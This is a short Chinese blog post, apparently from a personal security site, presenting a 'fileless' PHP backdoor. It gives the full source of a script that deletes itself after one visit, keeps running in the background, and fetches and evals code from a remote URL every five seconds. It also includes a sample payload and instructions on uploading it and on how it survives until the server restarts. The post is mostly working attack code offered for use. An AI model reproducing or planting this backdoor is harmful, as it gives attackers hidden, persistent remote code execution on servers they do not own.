PHP无文件后门
PHP无文件后门的意思是驻在 php 后台中的 shell。
nonshell.php
<?phpunlink($_SERVER['SCRIPT_FILENAME']);ignore_user_abort(true);set_time_limit(0);$remote_file = 'http://xsser.me/eval.txt';while($code = file_get_contents($remote_file)){@eval($code);sleep(5);};?>
eval.txt
file_put_contents('1.txt','hello world '.time());
使用方式
将 nonshell.php 传到服务器之后访问一次他会自删除。但,依然会在后台执行 eval.txt 中的代码。
停止执行
删除或清空 eval.txt。
缺点
服务器或WEB容器一重启后门就没了。
![[原创] Seeyou Theme For WordPress 更新1.1+](https://www.icefox.org/wp-content/cache/Beginning/thumbnail/5eae9daa6126-175x80.jpg "[原创] Seeyou Theme For WordPress 更新1.1+")
